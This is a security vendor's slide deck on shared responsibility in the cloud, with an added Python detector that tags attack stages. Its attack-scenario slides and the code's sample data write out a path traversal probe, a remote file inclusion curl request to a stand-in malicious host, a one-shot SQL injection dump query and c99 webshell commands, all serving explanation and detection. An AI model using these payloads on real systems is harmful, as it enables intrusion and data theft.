Realities of Security in the Cloud

  1. REALITIES OF SECURITY IN THE CLOUD. Mark Brooks, VP Sales Engineering, Alert Logic
  2. Security is a challenge.
  3. Security Has Changed
  4. Security in the Cloud is a Shared Responsibility. Layers: Apps | Virtual Machines | Networking | Infrastructure Services. Responsibilities by party:
     Customer: Secure Coding and Best Practices • Software and Virtual Patching • Configuration Management • Access Management (including multi-factor authentication) • Configuration Hardening • Patch Management • TLS/SSL Encryption • Network Security Configuration
     Alert Logic: Security Monitoring • Log Analysis • Vulnerability Scanning • Network Threat Detection • Web Application Firewall • Application-level attack monitoring
     Microsoft: Hypervisor Management • System Image Library • Root Access for Customers • Managed Patching (PaaS, not IaaS) • Logical Network Segmentation • Perimeter Security Services • External DDoS, spoofing and scanning monitored
  5. Let's talk about security coverage.
  6. Tame the Beast. Industry challenge: the good, the bad and the ugly. Classification → Action: Known Good → Allow (Identify | Tune | Permit); Known Bad → Block (Drop | Reconfigure); Suspicious → human expert required. This applies across the whole application stack: Web Apps, Server-side Apps, App Frameworks, Dev Platforms, Databases, Server OS, Hypervisor, Hardware.
  7. Classic 3-Tier Web Application: key target assets for attack across the full stack. 1. Custom application; 2. Web server implementation (Apache, IIS, NGINX); 3. Application server implementation (Tomcat, JBoss, Jetty, ASP); 4. Web server frameworks and languages (Struts, PHP, Java); 5. Databases (MySQL, Oracle, MSSQL, ...); 6. Azure services (VMs, Storage). [Diagram: users → Internet gateway → Traffic Manager → VNET with load balancers, web and app-server VM scale sets, DB instances across availability zones A and B, and Blob storage.]
  8. An attack scenario: recon. [Diagram: Internet gateway → Traffic Manager → VNET with LB, PHP application on Linux, MySQL instance on Linux, bastion host and storage across availability zones A and B.] Steps: 1 – perform a low-frequency application scan; 2 – test path traversal and enumerate directories; 3 – test remote file inclusion. Recon: a low-and-slow application-level scan tells the attacker it is a PHP app on Linux, likely backed by a MySQL DB, and suggests vulnerabilities to try. Path traversal test: /bWAPP/directory_traversal_2.php?directory=../../../../etc. The traversal succeeds and the attacker enumerates server directories. Remote file inclusion (RFI) test: curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site-import/admin/page.php. Attacker learnings: a vulnerable PHP/MySQL app, exposed to both smash-and-grab attacks and more persistent approaches.
  9. An attack scenario: opportunistic exfiltration. Step 4 – SQL injection data extraction attack. Entry and data exfiltration: the attacker launches a series of SQL injection discovery attempts, then a dump-in-one-shot query that returns full tables in a single response: http://victim.com/report.php?id=23 and(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a). Attacker achievements: obtained sensitive customer data without needing a local process or system breach on the servers. (Recon steps 1–3 as on the previous slide.)
  10. An attack scenario: persistent foothold. Step 5 – webshell injection; step 6 – commanding through the shell. Command and control (C&C): the attacker uploads a c99 webshell via the RFI vulnerability, establishing a persistent foothold for lateral movement, and drives it with requests such as: curl -X POST -F 'act=search' -F 'grep=' -F 'fullhexdump=' -F 'base64=' -F 'nixpasswd=' -F 'pid=' -F 'c=' -F 'white=' -F 'sig=' -F 'processes_sort=' -F 'd=/var/www/' -F 'sort=' -F 'f=' -F 'ft=' http [://] mysite [dot] com/path/to/c99. Attacker achievements: a foothold for further action and lateral movement. (Recon and entry/exfiltration steps as on the previous slides.)
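The attack chain on slides 8 to 10 (path traversal, RFI, dump-in-one-shot SQLi, c99 webshell) can be tagged by stage from the HTTP requests it generates. The detector below is an added example written for this page, not Alert Logic code; the request records, the hostnames malicious.example and the rule patterns are constructed, and the payloads are modelled on the slides rather than captured. It runs the same rules in two modes: "access log only" (method and URL, no body) and "HTTP inspection" (body included). The RFI payload and the webshell commands travel in POST bodies, so the access-log mode sees the recon and exfiltration stages but misses the C&C stage and the RFI probe entirely, which is the coverage gap the later scorecard slides are about.

```python
"""Stage-tagging detector for the PHP/MySQL attack chain shown in slides 8-10.

Added example, not Alert Logic code. The requests below are constructed to
mimic the slides' payloads (traversal, RFI, dump-in-one-shot SQLi, c99 webshell);
nothing here was captured from a real system.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample requests. Each record is what a sensor doing deep HTTP
# inspection sees; a plain access log sees only method + url (no body).
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "method": "GET", "url": "/index.php", "body": ""},
    {"src": "203.0.113.7", "method": "GET",
     "url": "/bWAPP/directory_traversal_2.php?directory=../../../../etc", "body": ""},
    {"src": "203.0.113.7", "method": "GET",  # same probe, URL-encoded
     "url": "/bWAPP/directory_traversal_2.php?directory=..%2F..%2F..%2F..%2Fetc%2Fpasswd",
     "body": ""},
    {"src": "203.0.113.7", "method": "POST",  # RFI: the payload rides in the form body
     "url": "/wp-content/plugins/site-import/admin/page.php",
     "body": "url=http://malicious.example/test.php"},
    {"src": "203.0.113.7", "method": "GET",  # dump-in-one-shot MySQL injection
     "url": "/report.php?id=23 and(select (@a) from (select(@a:=0x00),"
            "(select (@a) from (information_schema.schemata)where (@a)in "
            "(@a:=concat(@a,schema_name,'<br>'))))a)",
     "body": ""},
    {"src": "203.0.113.7", "method": "POST",  # c99 webshell command, body-only
     "url": "/path/to/c99.php", "body": "act=search&d=/var/www/&c=&sig="},
    {"src": "198.51.100.9", "method": "GET", "url": "/products.php?id=42", "body": ""},
]

# (stage, rule name, pattern applied to each fully decoded parameter value).
# Stages follow the slides' scorecard rows: Recon, Entry/Exfil, C&C.
VALUE_RULES = [
    ("Recon", "path-traversal", re.compile(r"(?:\.\./){2,}")),
    ("Recon", "remote-file-inclusion",
     re.compile(r"^(?:https?|ftp)://\S+\.php", re.IGNORECASE)),
    ("Entry/Exfil", "sql-injection",
     re.compile(r"(?:\bunion\s+select\b|\binformation_schema\b|@[a-z_]+:=|\bconcat\()",
                re.IGNORECASE)),
]


def decode_value(value, rounds=2):
    """Undo URL encoding repeatedly so %252F (double-encoded '/') is caught too."""
    for _ in range(rounds):
        value = unquote_plus(value)
    return value


def extract_params(request, inspect_body):
    """Query-string parameters, plus form-body parameters if the sensor sees the body."""
    parts = urlsplit(request["url"])
    params = parse_qsl(parts.query, keep_blank_values=True)
    if inspect_body and request["body"]:
        params += parse_qsl(request["body"], keep_blank_values=True)
    return parts.path, params


def classify(request, inspect_body=True):
    """Return the set of (stage, rule) hits for one request."""
    _path, params = extract_params(request, inspect_body)
    hits = set()
    for _name, value in params:
        decoded = decode_value(value)
        for stage, rule, pattern in VALUE_RULES:
            if pattern.search(decoded):
                hits.add((stage, rule))
    # c99-style shell signature: a POST carrying an 'act' verb and a 'd' parameter
    # holding an absolute directory. The script name is deliberately not used,
    # since shells are routinely renamed.
    names = dict(params)
    if request["method"] == "POST" and "act" in names and names.get("d", "").startswith("/"):
        hits.add(("C&C", "webshell"))
    return hits


def coverage(requests, inspect_body):
    """Map each attack stage to the rules that fired across a batch of requests."""
    seen = {}
    for request in requests:
        for stage, rule in classify(request, inspect_body):
            seen.setdefault(stage, set()).add(rule)
    return seen


if __name__ == "__main__":
    for mode, inspect in (("access log only", False), ("HTTP inspection", True)):
        print(mode, "->", coverage(SAMPLE_REQUESTS, inspect))
```

Two design points matter in practice. Parameters are decoded twice before matching, so a double-encoded traversal (`..%252F`) does not slip past a rule written for the plain form. The webshell rule keys on the request shape (a POST with an `act` verb and an absolute path in `d`) rather than on the filename, because a renamed c99 is still a c99. The low-and-slow scan from slide 8 is deliberately not covered here: it needs per-source aggregation over time (request rate, distinct paths, error ratio), not a per-request pattern.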
  11. Alert Logic's Approach. Foundation: asset and exposure visibility (audit logs; config and vulnerability assessment). Network, system and application infrastructure threat visibility (log collection; network inspection). Deep application threat visibility (HTTP inspection). Expert SOC analysis of findings. Content and intel: expert curation and R&D of content and intel, analytics and machine learning. Coverage: application-level web attacks (OWASP Top 10), attacks against vulnerable platforms and libraries, attacks against misconfigurations.
  12. Coverage needed for this scenario: how much can we see? Scorecard columns: low/slow scan, path traversal, RFI, SQLi, web shell, mapped to the stages Recon, Entry, Exfil and C&C, with an overall combined coverage score. Legend: no coverage | vulnerability coverage only | basic threat coverage | deep threat coverage. First data source: audit logs.
  13. Adding the foundation layer (asset and exposure visibility: config and vulnerability assessment). Config and vulnerability assessment reveal the vulnerabilities present that attackers can exploit, but attacks in motion cannot be detected with vulnerability and config scanning alone.
  14. Adding network inspection (network, system and application infrastructure threat visibility). Network inspection provides visibility of the attacker's actions against the known vulnerabilities exploited in the attack, and of whether they succeeded.
  15. Adding log collection and HTTP inspection (deep application threat visibility). Deep HTTP inspection of requests and responses, with learning and anomaly detection, deepens coverage for whole classes of application attacks.
  16. Integrated Security Model: infrastructure | content | human experts. Data and event sources (assets | config | logs) → automatic detection (block | alert | log), driven by ML algorithms and rules and analytics → incident investigation system (visual | context | hunt). Security experts: security researchers, data scientists, software programmers, security analysts.
  17. We designed security for cloud and hybrid environments, with modular services that grow with you. Get started in minutes: comply, with integration to cloud APIs and DevOps automation. Maintain coverage at cloud scale: auto-scaling support and out-of-band detection. Keep production flowing: a single pane of glass for workload and application security across cloud, hosted and on-premises.
  18. A recognized security leader. [Chart: survey responses to "Who is your primary in-use vendor for Cloud Infrastructure Security?" and "Who are the top vendors in consideration for Cloud Infrastructure Security?", with Alert Logic shown among the leaders alongside Amazon, Check Point, Chronicle Data, Cisco, Fortinet, Intel Security, Okta, Symantec, Barricade, JumpCloud, Evident.io, Palerra, Microsoft, CloudPassage, CloudCheckr, FortyCloud, ThreatStack and Other; the per-vendor counts are not recoverable from the extraction.] "Alert Logic has a head start in the cloud, and it shows." "...the depth and breadth of the offering's analytics and threat management process goes beyond anything we've seen..." (Peter Stephenson, SC Magazine review)
  19. Over 4,000 worldwide customers across automotive, healthcare, education, financial services, manufacturing, media/publishing, retail/e-commerce, energy and chemicals, technology and services, and government/non-profit.
  20. Thank You.
